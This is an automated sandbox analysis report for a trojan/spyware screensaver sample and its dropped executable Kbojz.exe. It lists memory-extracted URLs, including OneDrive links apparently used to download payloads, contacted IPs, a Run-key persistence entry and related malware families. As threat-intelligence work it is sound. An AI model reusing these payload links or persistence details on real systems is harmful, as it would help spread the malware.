                                            https://github.com/mgravell/protobuf-netJUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.472630617.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.entrust.net03UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1EantadUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.diginotar.nl/cps/pkioverheid0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://skydrive.live.com/redir.aspx?resid=26943FEBC022618F%21481&avres=Infected&averror=SUCCESS&vinUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002466000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/mgravell/protobuf-netiUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drfalse
                                                        high
                                                        https://www.google.com/search?q=wmfNtxfuk.tmpdb.6.drfalse
                                                          high
                                                          https://stackoverflow.com/q/11564914/23354;UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ocsp.entrust.net0DUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9vaKbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://onedrive.live.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://stackoverflow.com/q/14436606/23354Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.entrust.net/server1.crl0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://onedrive.live.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000213C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002444000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002465000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&iNtxfuk.tmpdb.6.drfalse
                                                                          high
                                                                          http://ocsp.thawte.com0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://github.com/mgravell/protobuf-netUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                                                              high
                                                                              https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drfalse
                                                                                high
                                                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchOazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                                                                  high
                                                                                  http://www.symauth.com/cps0(UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drfalse
                                                                                    high
                                                                                    https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiUKbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/favicon.icoBuyeg.tmpdb.2.drfalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                                                                          high
                                                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://www.google.com/sorry/indexUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000023F8000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002418000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.drfalse
                                                                                            high
                                                                                            https://onedrive.live.com/download?resid=26943FEBC022618FKbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://skydrive.live.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.symauth.com/rpa00UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drfalse
                                                                                                  high
                                                                                                  https://stackoverflow.com/q/2152978/23354UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://utqurw.am.files.1drv.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://public.am.files.1drv.com/y4mAdtlexFWsAsM5m_v175jQDQZ3JlPlheZX222y4JutpDgoqJHt5wLr_wX4GD45dXiKbojz.exe, 00000004.00000002.420766544.00000000022C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.codeplex.com/DotNetZipUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26aNtxfuk.tmpdb.6.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/search?q=netNtxfuk.tmpdb.6.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/sorry/indextestKbojz.exe, 00000006.00000002.482725847.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.drfalse
                                                                                                                high
                                                                                                                https://public.am.files.1drv.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002128000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://secure.comodo.com/CPS0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                                                                                                        high
                                                                                                                        http://crl.entrust.net/2048ca.crl0UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://utqurw.am.files.1drv.comUGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drfalse
                                                                                                                              high
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              150.171.41.11
                                                                                                                              dual-spov-0006.spov-dc-msedge.netUnited States
                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                              13.107.137.11
                                                                                                                              dual-spov-0006.spov-msedge.netUnited States
                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                              80.85.152.161
                                                                                                                              unknownRussian Federation
                                                                                                                              44493CHELYABINSK-SIGNAL-ASRUfalse
                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                              Analysis ID:1428798
                                                                                                                              Start date and time:2024-04-19 16:15:58 +02:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 9m 44s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.spyw.evad.winSCR@9/24@61/3
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 91%
                                                                                                                              • Number of executed functions: 554
                                                                                                                              • Number of non-executed functions: 33
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .scr
                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12, 20.72.77.134, 20.242.162.1, 20.242.161.228, 20.1.250.108
                                                                                                                              • Excluded domains from analysis (whitelisted): cosmic-eastus2-ns-d2d9c8d5cfc0.trafficmanager.net, odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, odwebpl.trafficmanager.net, cosmic-eastus2-ns-8a58b1860b73.trafficmanager.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, cosmic-eastus-ns-9067974ac67b.trafficmanager.net, odc-am-files-brs.onedrive.akadns.net, cosmic-eastus-ns-75bf60968b55.trafficmanager.net
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                              • VT rate limit hit for: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                              TimeTypeDescription
                                                                                                                              07:16:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kbojz C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                              07:17:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kbojz C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                              16:16:40API Interceptor354x Sleep call for process: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr modified
                                                                                                                              16:17:02API Interceptor586x Sleep call for process: Kbojz.exe modified
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              150.171.41.1120240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                  ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                    82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                      ref_00845-25-03-24.batGet hashmaliciousDBatLoaderBrowse
                                                                                                                                        RFQ#30091.CMD.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                          Ordine_51000042184300000455100.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                            PO_No_0013011100.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                              https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELAGet hashmaliciousUnknownBrowse
                                                                                                                                                SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                                                  • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  dual-spov-0006.spov-dc-msedge.net20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 150.171.43.11
                                                                                                                                                  20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  DHL Shipping Documents_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 150.171.43.11
                                                                                                                                                  ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  CONFIRMATION ORDER1.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 150.171.43.11
                                                                                                                                                  ref_00845-25-03-24.batGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  RFQ#30091.CMD.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 150.171.43.11
                                                                                                                                                  lewxa.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 150.171.43.11
                                                                                                                                                  Ordine_51000042184300000455100.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 150.171.41.11
                                                                                                                                                  dual-spov-0006.spov-msedge.netSecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.139.11
                                                                                                                                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 13.107.139.11
                                                                                                                                                  ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 13.107.139.11
                                                                                                                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 13.107.137.11
                                                                                                                                                  20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                  • 13.107.139.11
                                                                                                                                                  20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 13.107.139.11
